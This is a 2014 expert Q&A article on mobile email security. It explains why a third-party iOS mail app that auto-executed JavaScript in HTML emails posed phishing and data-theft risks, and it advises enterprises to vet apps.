Problem solve Get help with specific problems with your technologies, process and projects.

Mobile email security: Mitigating JavaScript risks, data loss

Mitigating JavaScript risks is essential to ensuring mobile email security. Discover how to keep your enterprise safe.

I recently read that a third-party mail app for iOS auto-executes JavaScript. Why didn't the Apple App Store flag that as a problem, and how can our organization keep our users safe from JavaScript risks, short of putting our own app vetting system in place for BYOD?

Ask the Expert

Do you have an application security question for Michael Cobb? Submit it now via email! (All questions are anonymous.)

Mailbox is a popular third-party email app for iPhone and iPad that is now owned by Dropbox. Web application security expert Michele Spagnuolo recently highlighted the fact that the app auto-executes any JavaScript contained in the body of incoming HTML emails. The app also loads external images with no option to disable the behavior.

At first glance, this may seem like a fuss about nothing; Apple's App Store didn't flag it as a problem, and some security commentators also wrote that it wasn't an issue. On top of that, many of today's Web 2.0 sites are packed with JavaScript and can't work without it.

So, why is JavaScript considered dangerous in the body of an email when it's not seen as a vulnerability in webpages? Are JavaScript risks more detrimental in email than the Web?

In reality, it's a question of control. A user chooses whether to visit a particular webpage, but he or she has no control over who can send them an email. Though spam filters can be configured to block certain types of email content or email from particular addresses, some malicious or spam emails will inevitably get through. Websites that have digital certificates can be verified as genuine, and browser settings and plug-ins such as NoScript can control which scripts on webpages are allowed to run. But with email, it's easy for an attacker to spoof the sender details in the address field, meaning that unwanted and unrequested content can easily appear in an email client. Therefore, by default email has to be sanitized as much as possible, with the user being given the option of displaying additional -- and potentially dangerous -- content if they want to.

JavaScript has long been used by cybercriminals to hide or load malicious content in webpages, track user activity, and steal login credentials. To curb these attacks, Web browsers enforce a Same Origin Policy, which limits scripts to reading data from and sending data to the same source as the page they're running in. However, there is no "same origin" for an email and, if viewed using a webmail service, an attacker's scripts would inherit the origin of the webmail domain, and that would end up being a security disaster. This is why the vast majority of email clients don't execute JavaScript in email; even webmail sites that include JavaScript in their own pages suppress JavaScript contained in the emails they display.

While the Mailbox app is not malicious and its behavior doesn't violate any of the App Store rules, its poor design could have easily been used by an attacker, particularly for delivering potent spear-phishing emails. While the data that could be stolen would be limited by the iOS sandbox, an email app has access to a lot of potentially valuable information. On a jailbroken device, the damage would be much worse.

Although Mailbox has fixed the issue and now strips JavaScript and images out before delivering emails to mobile devices to prevent JavaScript risks, the scenario still highlights the need for enterprises to vet all apps that are going to be used on devices connecting to the corporate network. Administrators should check an app's security settings and validate that they do actually work. They should also use a network protocol analyzer such as Wireshark to see the data the app sends from the device and whether it is encrypted. Creating an enterprise app store can easily facilitate the distribution of approved apps to employees.

This was last published in April 2014

Dig Deeper on Web application and API security best practices

Have a question for an expert?

Please add a title for your question

Get answers from a TechTarget expert on whatever's puzzling you.

You will be able to add details on the next page.

Start the conversation

Send me notifications when other members comment.

Please create a username to comment.